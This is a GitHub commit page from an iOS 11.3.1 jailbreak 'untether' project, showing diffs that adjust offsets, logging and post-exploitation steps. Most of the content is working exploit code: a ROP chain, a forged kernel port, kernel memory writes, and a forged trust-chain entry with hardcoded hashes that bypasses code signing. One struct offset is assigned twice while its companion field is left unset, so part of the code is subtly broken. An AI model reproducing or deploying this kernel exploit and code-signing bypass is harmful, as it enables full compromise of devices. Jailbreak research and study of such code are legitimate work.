Skip to content

Commit

Permalink
[untether] 11.3.1 nearly working
Browse files Browse the repository at this point in the history
littlelailo committed Feb 5, 2019
1 parent 9fd6820 commit a4e7023
Showing 6 changed files with 30 additions and 12 deletions.
2 changes: 2 additions & 0 deletions src/shared/common.h
Original file line number Diff line number Diff line change
@@ -17,6 +17,8 @@

#ifdef RELEASE
# define LOG(str, args...) do { } while(0)
#elif defined UNTETHERDBG
# define LOG(str, args...) do { NSLog(@"[%s] " str, __func__, ##args); sleep(1);} while(0)
#else
# define LOG(str, args...) do { NSLog(@"[%s] " str, __func__, ##args); } while(0)
#endif
12 changes: 6 additions & 6 deletions src/shared/jailbreak.m
Original file line number Diff line number Diff line change
@@ -38,7 +38,7 @@
ret = KERN_FAILURE;\
goto out;\
}
#if 1
#if 0
offsets_t offs = (offsets_t){
#ifdef __LP64__
.constant = {
@@ -614,19 +614,19 @@ kern_return_t jailbreak(uint32_t opt)
{
if ((opt & JBOPT_POST_ONLY) != 0)
{
LOG("finished post exploitation, running ldrestart...");
LOG("finished post exploitation, respringing...");

if (access("/usr/bin/ldrestart", F_OK) != 0)
if (access("/usr/bin/killall", F_OK) != 0)
{
LOG("failed to find ldrestart?!");
LOG("failed to find killall?!");
ret = KERN_FAILURE;
goto out;
}

ret = execprog("/usr/bin/ldrestart", NULL);
ret = execprog("/usr/bin/killall", (const char**)&(const char * []) {"/usr/bin/killall","SpringBoard"});
if (ret != 0)
{
LOG("failed to execute ldrestart: %d", ret);
LOG("failed to execute killall: %d", ret);
ret = KERN_FAILURE;
goto out;
}
2 changes: 1 addition & 1 deletion src/untether/install.m
Original file line number Diff line number Diff line change
@@ -57,7 +57,7 @@ int install(const char *config_path, const char *racoon_path, const char *dyld_c
myoffsets.stage3_fileoffset = 0;
myoffsets.stage3_loadaddr = myoffsets.new_cache_addr-0x100000;
myoffsets.stage3_size = 0x10000; // get the file size and round at page boundry
myoffsets.stage3_jumpaddr = myoffsets.stage3_loadaddr + 0x65c0; // nm of the function we want to jump to
myoffsets.stage3_jumpaddr = myoffsets.stage3_loadaddr + 0x6544; // nm of the function we want to jump to
myoffsets.stage3_CS_blob = 49744; // jtool --sig shows that info and I think we can get it when parsing the header
myoffsets.stage3_CS_blob_size = 624; // same for this one

14 changes: 10 additions & 4 deletions src/untether/stage2.m
Original file line number Diff line number Diff line change
@@ -861,7 +861,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
ADD_LOOP_START("test_loop")
ROP_VAR_ARG_HOW_MANY(1);
ROP_VAR_ARG("dylib_str",2);
CALL("write",1,0,1024,0,0,0,0,0);
CALL("write",2,0,1024,0,0,0,0,0);


/*
@@ -899,6 +899,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {


kport_t * fakeport = malloc(sizeof(kport_t));
memset(fakeport,0,sizeof(kport_t));
fakeport->ip_bits = IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
@@ -959,8 +960,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
struct trust_chain * new_entry = malloc(sizeof(struct trust_chain));
snprintf((char*)&new_entry->uuid,16,"TURNDOWNFORWHAT?");
new_entry->count = 2;
hash_t my_dylib_hash = {0x01,0xea,0x3a,0xea,0x23,0x45,0x5f,0xc3,0x07,0x53,0xbe,0xa7,0x78,0x2d,0x1b,0x17,0xb1,0xa8,0x75,0xef};
hash_t my_binary_hash = {0x30,0x46,0x97,0xbb,0x51,0xc0,0xde,0x21,0x5c,0x3c,0xb5,0xa7,0x33,0xb2,0x1b,0x34,0xe1,0xa9,0xe5,0x3f};
hash_t my_dylib_hash = {0x23,0xc0,0xa7,0xcc,0x36,0xdd,0x3d,0xa7,0x4a,0x25,0x46,0x50,0x38,0xd9,0xa6,0x20,0x76,0x2e,0x51,0x70};
hash_t my_binary_hash = {0xd4,0xd3,0x79,0x1b,0x17,0x2d,0xa2,0xf1,0x89,0xbd,0x2f,0xa7,0x5a,0xf6,0x84,0xaa,0xbf,0x8e,0x08,0x67};
memcpy(&new_entry->hash[0],my_dylib_hash,20);
memcpy(&new_entry->hash[1],my_binary_hash,20);
DEFINE_ROP_VAR("new_trust_chain_entry",sizeof(struct trust_chain),new_entry);
@@ -1297,7 +1298,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {

ROP_VAR_ARG_HOW_MANY(1);
ROP_VAR_ARG("WEDIDIT",2);
CALL("write",1,0,1024,0,0,0,0,0);
CALL("write",2,0,1024,0,0,0,0,0);

ROP_VAR_ARG_HOW_MANY(3);
ROP_VAR_ARG64("self",1);
@@ -1514,6 +1515,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
CALL("mach_port_deallocate",0,0,0,0,0,0,0,0);
*/


// ghetto dlopen
// get a file descriptor for that dylib
DEFINE_ROP_VAR("dylib_fd",8,&buf);
@@ -1583,6 +1585,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
uint32_t itk_registered;
uint32_t ipr_size;
uint32_t sizeof_task;
uint32_t task_all_image_info_addr;
uint32_t task_all_image_info_size;
} struct_offsets;

struct {
@@ -1634,6 +1638,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
lib_offsets->struct_offsets.itk_registered = 0x2f0;
lib_offsets->struct_offsets.ipr_size = 0x8;
lib_offsets->struct_offsets.sizeof_task = 0x5c8;
lib_offsets->struct_offsets.task_all_image_info_addr = 0x3a8;
lib_offsets->struct_offsets.task_all_image_info_addr = 0x3b0;
// iosurface stuff isn't set and also isn't used
lib_offsets->userland_funcs.write = get_addr_from_name(offsets,"write") - 0x180000000 + offsets->new_cache_addr;
lib_offsets->userland_funcs.IOConnectTrap6 = get_addr_from_name(offsets,"IOConnectTrap6") - 0x180000000 + offsets->new_cache_addr;
8 changes: 7 additions & 1 deletion src/untether/stage3.m
Original file line number Diff line number Diff line change
@@ -80,6 +80,8 @@
uint32_t itk_registered;
uint32_t ipr_size;
uint32_t sizeof_task;
uint32_t task_all_image_info_addr;
uint32_t task_all_image_info_size;
} struct_offsets;

struct {
@@ -174,7 +176,7 @@
} mach_msg_data_buffer_t;

//#define LOG(str, args...) do { } while(0)
#define LOG(str, args...) do {offsets->userland_funcs.write(1,str,1024);offsets->userland_funcs.write(1,"\n\n\n\n",4);} while(0)
#define LOG(str, args...) do {offsets->userland_funcs.write(2,str,1024);offsets->userland_funcs.write(1,"\n\n\n\n",4);} while(0)
#define KERN_INVALID_ARGUMENT 2
#define KERN_FAILURE 1
#define KERN_SUCCESS 0
@@ -486,6 +488,10 @@ void where_it_all_starts(kport_t * fakeport,void * fake_client,uint64_t ip_kobje
offsets->userland_funcs.mach_port_destroy(offsets->userland_funcs.mach_task_self(), maps[0]);
offsets->userland_funcs.mach_port_destroy(offsets->userland_funcs.mach_task_self(), maps[1]);

// setup kernel base and slide for post
kwrite64(remap_addr + offsets->struct_offsets.task_all_image_info_addr,offsets->constant.kernel_image_base + kslide);
kwrite64(remap_addr + offsets->struct_offsets.task_all_image_info_size,kslide);

// remap must cover the entire struct and be page aligned
uint64_t remap_start = remap_addr & ~(pgsize - 1);
uint64_t remap_end = (remap_addr + offsets->struct_offsets.sizeof_task + pgsize) & ~(pgsize - 1);
4 changes: 4 additions & 0 deletions src/untether/stage4.m
Original file line number Diff line number Diff line change
@@ -2,12 +2,16 @@
#include <fcntl.h>
#include <unistd.h>
#include <Foundation/NSObjCRuntime.h>
#include <shared/jailbreak.h>

int main() {
/*
printf("I guess this is how it feels to run in C and with a normal cache, you can just call functions\n");
int fd = open("/bootstrap/test/yowhatsup",O_WRONLY | O_CREAT);
write(fd,"WEAREOUTHERE",13);
while (1) {
NSLog(@"YEHA\n");
}
*/
jailbreak(JBOPT_POST_ONLY);
}

0 comments on commit a4e7023

Please sign in to comment.